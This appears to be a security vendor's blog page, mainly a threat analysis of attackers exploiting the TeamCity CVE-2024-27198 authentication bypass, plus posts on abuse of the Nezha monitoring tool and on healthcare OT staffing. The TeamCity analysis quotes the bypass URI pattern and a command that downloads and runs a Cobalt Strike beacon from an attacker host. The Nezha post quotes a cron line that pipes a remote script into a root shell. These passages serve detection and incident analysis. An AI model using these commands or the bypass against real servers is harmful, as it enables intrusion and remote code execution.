Blog
/
Network
/
August 21, 2024

How Darktrace Detects TeamCity Exploitation Activity

Darktrace observed the rapid exploitation of a critical vulnerability in JetBrains TeamCity (CVE-2024-27198) shortly following its public disclosure. Learn how the need for speedy detection serves to protect against supply chain attacks.
Written by
Justin Frank
Product Manager and Cyber Analyst
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Justin Frank
Product Manager and Cyber Analyst
Default blog image
21
Aug 2024

The rise in vulnerability exploitation

In recent years, threat actors have increasingly been observed exploiting endpoints and services associated with critical vulnerabilities almost immediately after those vulnerabilities are publicly disclosed. The time-to-exploit for internet-facing servers is accelerating as the risk of vulnerabilities in web components continuously grows. This growth demands faster detection and response from organizations and their security teams to ward off the rising number of exploitation attempts. One such case is that of CVE-2024-27198, a critical vulnerability in TeamCity On-Premises, a popular continuous integration and continuous delivery/deployment (CI/CD) solution for DevOps teams developed by JetBrains.

The disclosure of TeamCity vulnerabilities

On March 4, 2024, JetBrains published an advisory regarding two authentication bypass vulnerabilities, CVE-2024-27198 and CVE-2024-27199, affecting TeamCity On-Premises version 2023.11.3. and all earlier versions [1].

The most severe of the two vulnerabilities, CVE-2024-27198, would enable an attacker to take full control over all TeamCity projects and use their position as a suitable vector for a significant attack across the organization’s supply chain. The other vulnerability, CVE-2024-27199, was disclosed to be a path traversal bug that allows attackers to perform limited administrative actions. On the same day, several proof-of-exploits for CVE-2024-27198 were created and shared for public use; in effect, enabling anyone with the means and intent to validate whether a TeamCity device is affected by this vulnerability [2][3].

Using CVE-2024-27198, an attacker is able to successfully call an authenticated endpoint with no authentication, if they meet three requirements during an HTTP(S) request:

  • Request an unauthenticated resource that generates a 404 response.

/hax

  • Pass an HTTP query parameter named jsp containing the value of an authenticated URI path.

?jsp=/app/rest/server

  • Ensure the arbitrary URI path ends with .jsp by appending an HTTP path parameter segment.

;.jsp

  • Once combined, the URI path used by the attacker becomes:

/hax?jsp=/app/rest/server;.jsp

Over 30,000 organizations use TeamCity to automate and build testing and deployment processes for software projects. As various On-Premises servers are internet-facing, it became a short matter of time until exposed devices were faced with the inevitable rush of exploitation attempts. On March 7, the Cybersecurity and Infrastructure Security Agency (CISA) confirmed this by adding CVE-2024-27198 to its Known Exploited Catalog and noted that it was being actively used in ransomware campaigns. A shortened time-to-exploit has become fairly common for software known to be deeply embedded into an organization’s supply chain. Darktrace detected exploitation attempts of this vulnerability in the two days following JetBrains’ disclosure [4] [5].

Shortly after the disclosure of CVE-2024-27198, Darktrace observed malicious actors attempting to validate proof-of-exploits on a number of customer environments in the financial sector. After attackers validated the presence of the vulnerability on customer networks, Darktrace observed a series of suspicious activities including malicious file downloads, command-and-control (C2) connectivity and, in some cases, the delivery of cryptocurrency miners to TeamCity devices.

Fortunately, Darktrace was able to identify this malicious post-exploitation activity on compromised servers at the earliest possible stage, notifying affected customers and advising them to take urgent mitigative actions.

Attack details

Exploit Validation Activity

On March 6, just two days after the public disclosure of CVE-2024-27198, Darktrace first observed a customer being affected by the exploitation of the vulnerability when a TeamCity device received suspicious HTTP connections from the external endpoint, 83.97.20[.]141. This endpoint was later confirmed to be malicious and linked with the exploitation of TeamCity vulnerabilities by open-source intelligence (OSINT) sources [6]. The new user agent observed during these connections suggest they were performed using Python.

Figure 1: Advanced Search results shows the user agent (python-requests/2.25) performing initial stages of exploit validation for CVE-2024-27198.

The initial HTTP requests contained the following URIs:

/hax?jsp=/app/rest/server;[.]jsp

/hax?jsp=/app/rest/users;[.]jsp

These URIs match the exact criteria needed to exploit CVE-2024-27198 and initiate malicious unauthenicated requests. Darktrace / NETWORK recognized that these HTTP connections were suspicious, thus triggering the following models to alert:

  • Device / New User Agent
  • Anomalous Connection / New User Agent to IP Without Hostname

Establish C2

Around an hour later, Darktrace observed subsequent requests suggesting that the attacker began reconnaissance of the vulnerable device with the following URIs:

/app/rest/debug/processes?exePath=/bin/sh&params=-c&params=echo+ReadyGO

/app/rest/debug/processes?exePath=cmd.exe&params=/c&params=echo+ReadyGO

These URIs set an executable path to /bin/sh or cmd.exe; instructing the shell of either a Unix-like or Windows operating system to execute the command echo ReadyGO. This will display “ReadyGO” to the attacker and validate which operating system is being used by this TeamCity server.

The same  vulnerable device was then seen downloading an executable file, “beacon.out”, from the aforementioned external endpoint via HTTP on port 81, using a new user agent curl/8.4.0.

Figure 2: Darktrace’s Cyber AI Analyst detecting suspicious download of an executable file.
Figure 3: Advanced Search overview of the URIs used in the HTTP requests.

Subsequently, the attacker was seen using the curl command on the vulnerable TeamCity device to perform the following call:

“/app/rest/debug/processes?exePath=cmd[.]exe&params=/c&params=curl+hxxp://83.97.20[.]141:81/beacon.out+-o+.conf+&&+chmod++x+.conf+&&+./.conf”.

in attempt to pass the following command to the device’s command line interpreter:

“curl http://83.97.20[.]141:81/beacon.out -o .conf && chmod +x .conf && ./.conf”

From here, the attacker attempted to fetch the contents of the “beacon.out” file and create a new executable file from its output. This was done by using the -o parameter to output the results of the “beacon.out” file into a “.conf” file. Then using chmod+x to modify the file access permissions and make this file an executable aswell, before running the newly created “.conf” file.

Further investigation into the “beacon.out” file uncovered that is uses the Cobalt Strike framework. Cobalt Strike would allow for the creation of beacon components that can be configured to use HTTP to reach a C2 host [7] [8].

Cryptocurrency Mining Activities

Interestingly, prior to the confirmed exploitation of CVE-2024-27198, Darktrace observed the same vulnerable device being targeted in an attempt to deploy cryptocurrency mining malware, using a variant of the open-source mining software, XMRig. Deploying crypto-miners on vulnerable internet-facing appliances is a common tactic by financially motivated attackers, as was seen with Ivanti appliances in January 2024 [9].

Figure 4: Darktrace’s Cyber AI Analyst detects suspicious C2 activity over HTTP.

On March 5, Darktrace observed the TeamCity device connecting to another to rare, external endpoint, 146.70.149[.]185, this time using a “Windows Installer” user agent: “146.70.149[.]185:81/JavaAccessBridge-64.msi”. Similar threat activity highlighted by security researchers in January 2024, pointed to the use of a XMRig installer masquerading as an official Java utlity: “JavaAccessBridge-64.msi”. [10]

Further investigation into the external endpoint and URL address structuring, uncovered additional URIs: one serving crypto-mining malware over port 58090 and the other a C2 panel hosted on the same endpoint: “146.70.149[.]185:58090/1.sh”.

Figure 5:Crypto mining malware served over port 58090 of the rare external endpoint.

146.70.149[.]185/uadmin/adm.php

Figure 6: C2 panel on same external endpoint.

Upon closer observation, the panel resembles that of the Phishing-as-a-Service (PhaaS) provided by the “V3Bphishing kit” – a sophisticated phishing kit used to target financial institutions and their customers [11].

Darktrace Coverage

Throughout the course of this incident, Darktrace’s Cyber AI Analyst™ was able to autonomously investigate the ongoing post-exploitation activity and connect the individual events, viewing the individual suspicious connections and downloads as part of a wider compromise incident, rather than isolated events.

Figure 7: Darktrace’s Cyber AI Analyst investigates suspicious download activity.

As this particular customer was subscribed to Darktrace’s Managed Threat Detection service at the time of the attack, their internal security team was immediately notified of the ongoing compromise, and the activity was raised to Darktrace’s Security Operations Center (SOC) for triage and investigation.

Unfortunately, Darktrace’s Autonomous Response capabilities were not configured to take action on the vulnerable TeamCity device, and the attack was able to escalate until Darktrace’s SOC brought it to the customer’s attention. Had Darktrace been enabled in Autonomous Response mode, it would have been able to quickly contain the attack from the initial beaconing connections through the network inhibitor ‘Block matching connections’. Some examples of autonomous response models that likely would have been triggered include:

  • Antigena Crypto Currency Mining Block - Network Inhibitor (Block matching connections)
  • Antigena Suspicious File Block - Network Inhibitor (Block matching connections)

Despite the lack of autonomous response, Darktrace’s Self-Learning AI was still able to detect and alert for the anomalous network activity being carried out by malicious actors who had successfully exploited CVE-2024-27198 in TeamCity On-Premises.

Conclusion

In the observed cases of the JetBrains TeamCity vulnerabilities being exploited across the Darktrace fleet, Darktrace was able to pre-emptively identify and, in some cases, contain network compromises from the onset, offering vital protection against a potentially disruptive supply chain attack.

While the exploitation activity observed by Darktrace confirms the pervasive use of public exploit code, an important takeaway is the time needed for threat actors to employ such exploits in their arsenal. It suggests that threat actors are speeding up augmentation to their tactics, techniques and procedures (TTPs), especially from the moment a critical vulnerability is publicly disclosed. In fact, external security researchers have shown that CVE-2024-27198 had seen exploitation attempts within 22 minutes of a public exploit code being released  [12][13] [14].

While new vulnerabilities will inevitably surface and threat actors will continually look for novel or AI-augmented ways to evolve their methods, Darktrace’s AI-driven detection capabilities and behavioral analysis offers organizations full visibility over novel or unknown threats. Rather than relying on only existing threat intelligence, Darktrace is able to detect emerging activity based on anomaly and respond to it without latency, safeguarding customer environments whilst causing minimal disruption to business operations.

Credit to Justin Frank (Cyber Analyst & Newsroom Product Manager) and Daniela Alvarado (Senior Cyber Analyst)

Appendices

References

[1] https://blog.jetbrains.com/teamcity/2024/03/additional-critical-security-issues-affecting-teamcity-on-premises-cve-2024-27198-and-cve-2024-27199-update-to-2023-11-4-now/

[2] https://github.com/Chocapikk/CVE-2024-27198

[3] https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/

[4] https://www.darkreading.com/cyberattacks-data-breaches/jetbrains-teamcity-mass-exploitation-underway-rogue-accounts-thrive

[5] https://www.gartner.com/en/documents/5524495
[6]https://www.virustotal.com/gui/ip-address/83.97.20.141

[7] https://thehackernews.com/2024/03/teamcity-flaw-leads-to-surge-in.html

[8] https://www.cobaltstrike.com/product/features/beacon

[9] https://darktrace.com/blog/the-unknown-unknowns-post-exploitation-activities-of-ivanti-cs-ps-appliances

[10] https://www.trendmicro.com/en_us/research/24/c/teamcity-vulnerability-exploits-lead-to-jasmin-ransomware.html

[11] https://www.resecurity.com/blog/article/cybercriminals-attack-banking-customers-in-eu-with-v3b-phishing-kit

[12] https://www.ncsc.gov.uk/report/impact-of-ai-on-cyber-threat

[13] https://www2.deloitte.com/content/dam/Deloitte/us/Documents/risk/us-design-ai-threat-report-v2.pdf

[14] https://blog.cloudflare.com/application-security-report-2024-update

[15] https://www.virustotal.com/gui/file/1320e6dd39d9fdb901ae64713594b1153ee6244daa84c2336cf75a2a0b726b3c

Darktrace Model Detections

Device / New User Agent

Anomalous Connection / New User Agent to IP Without Hostname

Anomalous Connection / Callback on Web Facing Device

Anomalous Connection / Application Protocol on Uncommon Port

Anomalous File / EXE from Rare External Location

Anomalous File / Internet Facing System File Download

Anomalous Server Activity / New User Agent from Internet Facing System

Device / Initial Breach Chain Compromise

Device / Internet Facing Device with High Priority Alert

Indicators of Compromise (IoC)

IoC -     Type – Description

/hax?jsp=/app/rest/server;[.]jsp - URI

/app/rest/debug/processes?exePath=/bin/sh&params=-c&params=echo+ReadyGO - URI

/app/rest/debug/processes?exePath=cmd.exe&params=/c&params=echo+ReadyGO – URI -

db6bd96b152314db3c430df41b83fcf2e5712281 - SHA1 – Malicious file

/beacon.out - URI  -

/JavaAccessBridge-64.msi - MSI Installer

/app/rest/debug/processes?exePath=cmd[.]exe&params=/c&params=curl+hxxp://83.97.20[.]141:81/beacon.out+-o+.conf+&&+chmod++x+.conf+&&+./.con - URI

146.70.149[.]185:81 - IP – Malicious Endpoint

83.97.20[.]141:81 - IP – Malicious Endpoint

MITRE ATT&CK Mapping

Initial Access - Exploit Public-Facing Application - T1190

Execution - PowerShell - T1059.001

Command and Control - Ingress Tool Transfer - T1105

Resource Development - Obtain Capabilities - T1588

Execution - Vulnerabilities - T1588.006

Written by
Justin Frank
Product Manager and Cyber Analyst
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Justin Frank
Product Manager and Cyber Analyst

How Attackers Abuse the Chinese Nezha Monitoring Tool

Network
June 10, 2026
Nathaniel Bill
Malware Research Engineer
Watch the NIS2 Webinar
Trending blogs
1
Prompt Security in Enterprise AI: Strengths, Weaknesses, and Common Approaches
May 20, 2026
2
How Empowering End Users can Improve Your Email Security and Decrease the Burden on the SOC
May 8, 2024
3
Elevating Network Security: Confronting Trust, Ransomware, & Novel Attacks
Jun 21, 2024
4
The State of AI in Cybersecurity: Unveiling Global Insights from 1,800 Security Practitioners
Apr 9, 2024
5
The State of AI in Cybersecurity: The Impact of AI on Cybersecurity Solutions
May 13, 2024

More in this series

No items found.
Continue reading
Network
June 10, 2026

How Attackers Abuse the Chinese Nezha Monitoring Tool

This blog examines how attackers abuse the Chinese-developed Nezha monitoring tool, a legitimate open-source platform with remote access capabilities. Darktrace analysis of a honeypot intrusion highlights malicious deployment via containers, demonstrating how dual-use software enables stealthy operations, trust inversion, and detection challenges in dynamic cloud and enterprise environments modern.
Nathaniel Bill
Malware Research Engineer
Read more
Network
May 21, 2026

Darktrace named a Leader in the 2026 Gartner® Magic Quadrant™ for Network Detection and Response (NDR) For the Second Consecutive Year

Darktrace has been named a Leader in the 2026 Gartner® Magic Quadrant™ for Network Detection and Response (NDR) for the second consecutive year. We believe this reflects continued execution in NDR, ongoing AI innovation, and strong outcomes delivered for customers globally.
Mikey Anderson
Product Marketing Manager, Network Detection & Response
Read more
Network
May 19, 2026

When Open Source Is Weaponized: Analysis of a Trojanized 7 Zip Installer

Attackers abused a trojanized 7‑Zip installer distributed via a typo‑squatted domain to establish proxyware infections worldwide. This blog analyzes how social engineering, trusted open‑source software, and stealthy command‑and‑control activity enabled widespread compromise, highlighting the importance of software validation, user awareness, and proactive network‑level detection.
Justin Torres
Cyber Analyst
Read more

Blog

/

Network

/

June 10, 2026

How Attackers Abuse the Chinese Nezha Monitoring Tool

nezha monitoring toolDefault blog imageDefault blog image

What is Nezha?

Nezha is an open-source tool that allows system administrators to centrally monitor multiple servers, including their resource usage such as CPU and network usage, and uptime. The tool also enables remote administrative access via an interactive shell.

The project has just under 10,000 stars on GitHub and has seen widespread adoption in the Chinese IT community, with many forum posts providing guides on installation and usage.

However, Nezha’s status as a legitimate executable that has remote access capabilities creates an opportunity for misuse. Instead of deploying a regular command-and-control (C2) implant, attackers can deploy Nezha directly on compromised hosts. As these deployments are functionally indistinguishable from legitimate installations, they can blend into expected operational tooling and evade detection.

Darktrace’s analysis of a Nezha infection

Darktrace operates several high-interaction honeypots to observe attacker techniques and behaviors. Darktrace analysts observed an intrusion against the Docker-based honeypot, initiated with a malicious container create command.

The malicious container create command.
Figure 1: The malicious container create command.

Docker allows any host file or directory to be passed through to a container, granting read and write access. In this case, the attacker made use of this to pass through the cron.d directory, which is used to schedule recurring tasks, such as maintenance or backup commands.

These commands and timings are stored in the cron.d directory, which the attacker can now write to because it is passed through to their malicious container. By writing a job to this directory from within the container, the cron service running on the host detects the new job and executes it on the host, effectively allowing the attacker to escape the container.

The attacker the created a malicious cron job named ngk:
* * * * * root curl hxxps://file.gpu5[.]com/linux_install.sh | bash

This resulted in the host downloading and running the linux_install.sh file with root privileges.

The linux_install script installs several dependencies, sets up environmental variables, and retrieves a second-stage script (nezha_install.sh) from the same domain.

The linux_install script.
Figure 2: The linux_install script.

The nezha_install.sh script based on the official Nezha installer but has been modified to hard code configuration values, such as the server address, and to remove interactive prompts, allowing it to be installed without user input.

Open by design

One of Nezha’s most interesting design choices is that its main monitoring panel does not require authentication to view a list of monitored hosts. This exposes a list of compromised systems via the attacker-controlled panel, enabling direct observation of the operation’s scale, victimology and infrastructure.

The attacker’s Nezha dashboard.
Figure 3: The attacker’s Nezha dashboard.

At the time of analysis, the campaign had infected 141 servers, with 45 still online and accessible.  The number of online servers was previously higher, suggesting that some victims may have discovered and removed the infection.

The exposed dashboard provides insights into victim characteristics, including geographic distribution, hardware specification, and resource usage. Most infected hosts were low-spec systems, commonly one or two core Xeon CPUs and less than 4GB of RAM, indicating they were likely small virtual private servers (VPS) with limited value to the attacker.

Many systems also exhibited 100% CPU usage, which may indicate concurrent compromise, such as cryptocurrency mining activity by other threat actors.

Open-source intelligence platforms such as Shodan and Censys can also identify publicly exposed instances of Nezha. Although authentication is required to execute commands on a monitored server, visibility into dashboards still provides valuable intelligence for attackers and defenders alike.

At the time of writing, Darktrace identified 33 internet-facing Nezha installations as openly accessible.

Key takeaways

The abuse of legitimate software has become a consistent feature of modern intrusion activity, enabling attackers to operate without deploying traditional malware and reducing the risk of detection.

This creates a form of “trust inversion”, where tools typically associated with routine operations may instead indicate malicious activity when deployed outside expected contexts. Organizations should therefore prioritize asset visibility and software governance, ensuring that unexpected tool deployments can be identified and investigated, rather than focusing solely on malware-centric detection.

This challenge is especially pronounced in cloud environments, where legitimate monitoring tools may represent either essential software or an attacker backdoor. The scale and dynamic nature of cloud environments further complicate distinguishing between benign and malicious use.

Credit to Nathaniel Bill (Malware Research Engineer)
Edited by Ryan Traill (Content Manager)

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer

Blog

/

OT

/

June 9, 2026

Healthcare’s OT Cybersecurity Gap: Why Hospitals Must Make the Same Security Investments as Regulated Critical Infrastructures

healthcare OTDefault blog imageDefault blog image

Rethinking the healthcare attack surface

When most people think about Operational Technology (OT) cybersecurity, they think about oil & gas pipelines, utilities, manufacturing plants, or power grids. However, hospitals & healthcare systems have quickly become a point of focus in the OT cybersecurity community as they do employ a variety of OT in the form of IoMT (Internet of Medical Things) networked devices such as: infusion pumps, imaging systems, patient monitoring equipment, laboratory systems, and traditional industrial control systems (ICS) in the form of smart building management systems (BMS) and even on site power generation control systems. 

These healthcare environments are no longer just traditional IT ecosystems, they are cyber-physical environments where disruption can directly impact patient care, operational continuity, and ultimately patient safety.

The OT cybersecurity expertise gap in healthcare organizations

Our research in the OT cybersecurity space revealed a concerning trend. Many hospitals and healthcare networks lack dedicated OT cybersecurity teams, OT security full time employees (FTE) and even OT expertise in the form of OT security certifications when compared to other critical infrastructure sectors.

On the other hand, within industries such as energy and manufacturing, we encounter more mature OT security programs that employ full time employees  dedicated to OT cybersecurity with OT security certifications and expertise to secure industrial and operational environments and lead investment in OT security processes and technology.

When reviewing the top 20 U.S. Hospitals by market cap, given what is publicly available on LinkedIn, only one FTE with an OT cybersecurity certification was found. The certifications that were searched for include: GIAC GICSP, GIAC GRID, GIAC GCIP and all ISA/IEC 62443 certifications. When replicating this same search across the top 20 utility providers in the US, 73 FTEs with OT related certifications were identified. As a control group, we looked within financial services, an industry NOT expected to have OT systems worth investing in FTEs to protect. However, the top 20 US financial institutions had 18 FTEs with OT related certifications. 

What these findings reveal

Overall, the findings regarding healthcare investment in OT security FTEs are surprising given how operationally dependent modern healthcare has become on OT. So why aren't hospitals investing in OT security personnel at the rate of peer critical infrastructures? It could just be lack of awareness; however, there are other, more plausible reasons.  

Based on historical trends in cyber incidents within the healthcare space, one could speculate that there is significantly greater likelihood of being victim to an attack that  focuses on extortion or data theft rather than an attack on specific OT systems. The amount of ransomware events incurred in healthcare, that historically do not target OT systems, may divert attention and security investment to the parts of the attack surface most likely to be targeted by ransomware. Additionally, data theft is a relevant threat objective for hospitals given PHI, PCI and PII, and data theft does not traditionally align with attacks targeting OT.  

However, with focused investment to address data theft and with adversaries new capability to string together chains of vulnerabilities of different severity scores using advancements in AI, we could be entering a threat landscape where adversaries pivot their tactics to target exposed and under protected devices and systems like OT. For example, although not a patient records database, predominant IOMT protocols HL7 and DICOM are unencrypted plaintext protocols and unless encrypted it is very simple for adversaries, who are sniffing traffic, to identify protected health information (PHI) in these communication protocols.

Why OT cybersecurity expertise can be effective for healthcare organizations

The convergence of IT, OT, and IoMT is already here, and threat actors are increasingly aware of the operational vulnerabilities that come with it. Additionally, as AI solutions such as agentic or generative applications are adopted and deployed, the attack surface will continue to change as permissions, and new connections will exist to support AI efficiency. From a cybersecurity standpoint, the reality is that many healthcare organizations are still working to establish consistent visibility and governance across their enterprise-connected devices and systems as their attack surface is changing in real time.  As the healthcare sector remains a significant target for cyber-attacks, hospitals would be well advised to begin addressing their operational environments OT as a critical component of their attack surface and invest in securing them first with people, then process and technology. 

What can healthcare organizations do to secure their OT

Including OT in current cybersecurity processes such as red teaming and testing incident response plans that take OT into account alongside building dedicated OT security capabilities including improving OT network visibility, leveraging OT network anomaly detection, micro-segmentation, and secure remote access will become essential steps in strengthening healthcare resilience. 

However, before any of the above processes or investments in technology can be made, these healthcare organizations, like the other critical infrastructure sectors, need to invest in the people with the experience in OT security to lead, implement, manage and audit the investment in OT cybersecurity technology and processes.  In cases where headcount cannot be added, investment in OT security certifications, such as the ones listed in this article, and participation on OT security events focused on practitioner training for existing cybersecurity employees can move the needle in terms of bringing OT expertise to the existing team.  

In an industry where uptime and safety are as mission critical as they are for a power utility, OT cybersecurity FTEs can no longer be viewed as optional for healthcare organizations and must become part of the foundation of modern healthcare cybersecurity strategy. 

[related-resource]

Continue reading
About the author
Daniel Simonds
Director of Operational Technology
Your data. Our AI.
Elevate your network security with Darktrace AI